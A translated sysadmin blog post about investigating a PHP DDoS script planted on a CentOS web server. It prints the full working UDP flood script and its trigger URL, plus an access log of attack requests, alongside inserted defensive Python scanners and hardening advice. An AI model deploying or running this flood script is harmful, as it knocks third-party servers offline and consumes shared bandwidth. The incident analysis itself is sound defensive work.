Remembering the time a CentOS server had a Trojan planted on it

  • 2020-05-17 07:27:42
  • OfStack

At 5 am this morning I received an alert from dianbao saying that website M was unavailable. I was sleeping soundly, and besides, the system hosting the site is CentOS and the important data is backed up every day, so it should be quite safe and I didn't worry about it. I went back to sleep.

At 9 in the morning the person in charge of the machine room called me directly: the network of the whole machine room was extremely slow, and none of the unit's websites would open, or they opened very slowly.

I rushed over and checked the network, and found that 175 was continuously sending out packets at 50M/s, and 175 was the server hosting M.

I SSHed straight into the 175 server and found that even the SSH connection to it was slow. Once connected, I ran top to check the CPU load:

top

Two apache processes were found, each using more than 40% CPU, so I stopped the httpd service immediately:


service httpd stop

After stopping httpd I looked at the network state again: the 175 server was no longer sending packets out, and everything was back to normal.

From this it looked like the 175 server had a Trojan planted on it and was blasting packets outward, eating up all of the machine room's bandwidth.

The next step was to catch the Trojan!

The 175 server sits behind a hardware firewall with only HTTP port 80 and SSH port 22 open. SSH is unlikely to have been stolen, so the way in was probably a web vulnerability. It was hit at 5 am, so the Trojan file should have been created within the last day.

Go to the root directory of site M, look for files changed within the last day, and run:


find ./ -mtime -1

Sure enough, a suspicious file named phzLtoxn.php showed up in the listing. To see who created the Trojan, run:


ls -l phzLtoxn.php

By the time I got to this point the file was gone. Does it self-destruct?

It turned out there had been a small episode: Xiao Huang, the admin next door, had also noticed the file and deleted it without a second thought. I gave Xiao Huang a lecture: you see a Trojan and all you know is delete, delete, delete! Can't the Trojan simply be regenerated? You have to follow the vine to the melon, not just cut it off; you have to find the source of the leak! Since it was already deleted, I started httpd again, inviting the wolf back into the house, and waited to see whether the file would regenerate.

Sure enough, within half an hour a new phzLtoxn.php file was created. Checking it showed the file was created by apache, so it must have been uploaded through a flaw in the website.
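The two commands above (find for recently changed files, ls -l for the owner) can be folded into one triage pass. The following is an added example, not code from the post: it lists files changed within the last day under a web root, records whether the web server's uid owns each one, and flags PHP files that carry at least two of the markers seen in phzLtoxn.php (a UDP fsockopen, ignore_user_abort, a huge set_time_limit, a target taken from $_GET). The web root, the sample files and the uid it tests with are constructed for the demo.

```python
import os
import re
import tempfile
import time
from pathlib import Path

# Weak signals lifted from the planted script; a file is flagged only when it
# matches at least two, so a lone set_time_limit() in a normal page is not enough.
MARKERS = {
    "udp_socket": re.compile(r'fsockopen\s*\(\s*["\']udp://'),
    "ignore_abort": re.compile(r"ignore_user_abort\s*\("),
    "huge_time_limit": re.compile(r"set_time_limit\s*\(\s*\d{4,}"),
    "target_from_get": re.compile(r"\$_GET\s*\[\s*['\"](host|port|time)['\"]"),
}

def recently_modified(root, max_age=86400, now=None):
    """Same idea as `find ./ -mtime -1`: files whose mtime lies within max_age seconds."""
    now = time.time() if now is None else now
    return sorted(p for p in Path(root).rglob("*")
                  if p.is_file() and now - p.stat().st_mtime <= max_age)

def scan_file(path, web_uid):
    """Same idea as `ls -l` plus a content check: who owns the file and which markers hit."""
    text = Path(path).read_text(errors="replace")
    matched = [name for name, rx in MARKERS.items() if rx.search(text)]
    return {"path": str(path), "owned_by_web_user": os.stat(path).st_uid == web_uid,
            "markers": matched, "suspicious": len(matched) >= 2}

def triage(root, web_uid, max_age=86400):
    """Scan every recently changed file under root and keep only the suspicious ones."""
    reports = (scan_file(p, web_uid) for p in recently_modified(root, max_age))
    return [r for r in reports if r["suspicious"]]

def build_sample_webroot():
    """Constructed web root: one ordinary page and one look-alike of the planted script."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "index.php").write_text("<?php set_time_limit(30); echo 'hello'; ?>")
    (root / "phzLtoxn.php").write_text(
        "<?php set_time_limit(999999); ignore_user_abort(TRUE); $host = $_GET['host']; ?>")
    return root

def demo():
    """Triage the sample tree with the current user standing in for the apache uid."""
    root = build_sample_webroot()
    return [(Path(r["path"]).name, r["owned_by_web_user"], r["markers"])
            for r in triage(root, os.getuid())]

if __name__ == "__main__":
    print(demo())
```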

Analyse the Trojan file to see what the hacker intended.

The source code of phzLtoxn.php is posted here with simple comments, for learning purposes only.


<?php
// Let the script run for (practically) as long as it likes
set_time_limit(999999);
// IP of the server to attack
$host = $_GET['host'];
// Port of the server to attack
$port = $_GET['port'];
// How long, in seconds, to keep attacking
$exec_time = $_GET['time'];
// Number of bytes sent per packet
$Sendlen = 65535;
$packets = 0;
// Keep running even if the client (the attacker's browser) disconnects
ignore_user_abort(TRUE);
// step 1. Check that the target $host, $port and running time $exec_time are all present.
// If not, a ?rat= parameter makes the script echo the zombie's hostname, IP, OS and
// web server wrapped in the rat marker, so the attacker can tell the copy is still alive.
if (StrLen($host) == 0 or StrLen($port) == 0 or StrLen($exec_time) == 0) {
    if (StrLen($_GET['rat']) <> 0) {
        // 'SERVER_software' is left as in the original; PHP's key is SERVER_SOFTWARE, so this part prints nothing
        echo $_GET['rat'] . $_SERVER["HTTP_HOST"] . "|" . GetHostByName($_SERVER['SERVER_NAME']) . "|" . php_uname() . "|" . $_SERVER['SERVER_software'] . $_GET['rat'];
        exit;
    }
    echo "Warning to: opening";
    exit;
}
// step 2. Build the payload string $out: 65535 bytes of "AAAAAAAAAA..."
for ($i = 0; $i < $Sendlen; $i++) {
    $out .= "A";
}
$max_time = time() + $exec_time;
// step 3. The attack: send the string to the target over UDP in a tight loop until time runs out
while (1) {
    $packets++;
    if (time() > $max_time) {
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
    if ($fp) {
        fwrite($fp, $out);
        fclose($fp);
    }
}
// step 4. Attack statistics
echo "Send Host $host:$port<br><br>";
echo "Send Flow $packets * ($Sendlen/1024=" . round($Sendlen / 1024, 2) . ")kb / 1024 = " . round($packets * $Sendlen / 1024 / 1024, 2) . " mb<br><br>";
echo "Send Rate " . round($packets / $exec_time, 2) . " packs/s" . round($packets / $exec_time * $Sendlen / 1024 / 1024, 2) . " mb/s";
?>

As the code above shows, this is a typical DDoS attack script. The hackers were using our server as a zombie, organising a large number of zombie servers to flood a target with packets. The hacker only needs to open a browser and enter http://<M domain>.com/phzLtoxn.php?host=x.x.x.x&port=xx&time=xx to launch a DDoS attack on the target server.

Look at the httpd log to analyse where the attack requests came from, and run:


tail /var/log/httpd/access.log | grep phzLtoxn.php
183.12.75.240 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - [10/Aug/2012:10:38:56 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - [10/Aug/2012:10:38:58 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - [10/Aug/2012:10:39:08 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
110.185.121.167 - - [10/Aug/2012:10:39:12 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=198.148.89.34&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=174.139.81.91&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=199.119.207.133&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=218.93.248.98&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
118.161.219.152 - - [10/Aug/2012:10:39:28 +0800] "GET /phzLtoxn.php?host=61.164.148.49&port=80&time=60 HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"

The source IPs turn out to come from several countries, and the target server IPs are from several countries too. It is a little strange: is the hacker actually targeting anything? Bored hackers.
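A grep only shows the raw lines; what the post actually reads off them (which controller IPs called the script, which victims they pointed it at, and whether the copy was still on disk) is quicker to get from a small parser. The following is an added example, not from the post: it parses Apache combined-format lines like those above, keeps only hits on phzLtoxn.php, and separates flood orders (host/port/time) from the rat= liveness probes handled in step 1 of the script. The sample lines it ships with are constructed on RFC 5737 documentation addresses, not copied from the real log.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format as in the excerpt above; referer and user agent
# come after the size field and are ignored.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

def parse_line(line):
    """Split one log line into fields, or return None for a line that does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec

def summarise(lines, script="phzLtoxn.php"):
    """Group requests to the planted script by controller IP, victim and HTTP status."""
    orders = defaultdict(Counter)  # controller IP -> victim host:port -> hits
    probes = Counter()             # controller IP -> ?rat= liveness checks (step 1 of the script)
    statuses = Counter()           # a 404 means the file was missing when the order arrived
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/" + script):
            continue
        q = rec["query"]
        statuses[rec["status"]] += 1
        if "host" in q and "port" in q:
            orders[rec["src"]][q["host"] + ":" + q["port"]] += 1
        elif "rat" in q:
            probes[rec["src"]] += 1
    return {"orders": {s: dict(v) for s, v in orders.items()},
            "probes": dict(probes), "statuses": dict(statuses)}

# Constructed sample lines in the same layout as the real excerpt, on RFC 5737 addresses.
UA = '"-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)"'
SAMPLE_LOG = [
    f'192.0.2.10 - - [10/Aug/2012:10:38:46 +0800] "GET /phzLtoxn.php?rat=ok HTTP/1.1" 200 120 {UA}',
    f'192.0.2.10 - - [10/Aug/2012:10:38:50 +0800] "GET /phzLtoxn.php?host=203.0.113.5&port=80&time=60 HTTP/1.1" 200 210 {UA}',
    f'198.51.100.7 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=203.0.113.5&port=80&time=60 HTTP/1.1" 404 290 {UA}',
    f'198.51.100.7 - - [10/Aug/2012:10:39:27 +0800] "GET /phzLtoxn.php?host=203.0.113.9&port=53&time=60 HTTP/1.1" 404 290 {UA}',
    f'198.51.100.7 - - [10/Aug/2012:10:39:30 +0800] "GET /index.php HTTP/1.1" 200 5120 {UA}',
    "garbage line that does not parse",
]
```

Run summarise(SAMPLE_LOG) to see the per-controller victim lists; on a real log, feed it the lines from the grep above instead.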
Next step: find the hole!

1. I re-examined the file permissions under site M's directory. Only the few necessary cache and static directories now have write permission for apache, which stops the phzLtoxn.php file from being generated again.

2. I started the httpd service again and used the 360 website scanner http://webscan.360.cn to check site H for vulnerabilities. It found that site H had a serious remote execution vulnerability, so I hurried to apply the patch.

3. After patching, I also changed the passwords of the system users, database users, FTP users and site M users.

After several days of observation, everything was normal.

A few security principles to summarise:

1. Minimize permissions.

Permissions on the web directory must be set, and apache should have write permission only on the few folders that need it.

2. Always pay attention to patch updates.

Regularly use third-party website security scanners such as http://webscan.360.cn; you can also refer to the ten security assessment tools. If the website is built on a commonly used program, pay close attention to the vulnerability information on the WooYun vulnerability platform, http://www.wooyun.org/.

3. After being hit, be sure to mend the fold after the sheep are lost.

Don't just delete, delete, delete; find the source of the compromise and analyse what the hacker did.
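Principle 1 above (and remediation step 1 earlier) is easy to state and easy to get wrong across a large tree. The following is an added example, not code from the post: it walks a web root and reports every directory the web server account could create files in, using the same owner/group/other write-bit logic the kernel applies, and compares that against an allowlist of the few cache/static folders that are meant to be writable. The web root, the uid/gid it tests with and the allowlist are constructed for the demo.

```python
import os
import stat
import tempfile
from pathlib import Path

def can_write(st, uid, gids):
    """Apply the owner/group/other write bit the way the kernel would for uid and gids."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def writable_dirs(root, uid, gids):
    """Directories under root (root itself included) the account could create files in."""
    root = Path(root)
    dirs = [root] + [p for p in root.rglob("*") if p.is_dir()]
    return sorted(str(p.relative_to(root)) for p in dirs if can_write(p.stat(), uid, gids))

def audit(root, uid, gids, allowlist):
    """Writable directories not on the allowlist: each one is a place a Trojan could land."""
    return [d for d in writable_dirs(root, uid, gids) if d not in allowlist]

def build_sample_webroot():
    """Constructed tree: cache and uploads are meant to be writable, includes is a mistake."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    os.chmod(root, 0o755)
    layout = {"cache": 0o775, "static/uploads": 0o777, "includes": 0o777, "lib": 0o755}
    for name, mode in layout.items():
        (root / name).mkdir(parents=True)
        os.chmod(root / name, mode)
    os.chmod(root / "static", 0o755)
    return root

def demo():
    """Audit the sample tree as an account that is not the owner but shares its group."""
    root = build_sample_webroot()
    web_uid = os.getuid() + 1            # hypothetical apache uid: not the file owner
    web_gids = {os.stat(root).st_gid}    # but in the same group as the tree
    allowlist = {"cache", "static/uploads"}
    return {"writable": writable_dirs(root, web_uid, web_gids),
            "findings": audit(root, web_uid, web_gids, allowlist)}

if __name__ == "__main__":
    print(demo())   # {'writable': ['cache', 'includes', 'static/uploads'], 'findings': ['includes']}
```

On a real server, pass the apache account's uid and group set (from the passwd and group databases) and the site's actual document root instead of the constructed ones.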

I would still like to ask the experts to analyse this: why did the hackers use so many zombies to DDoS different servers when there is no connection between the servers being attacked? Why aren't the attacks targeted? Is it just to burn bandwidth for fun?!

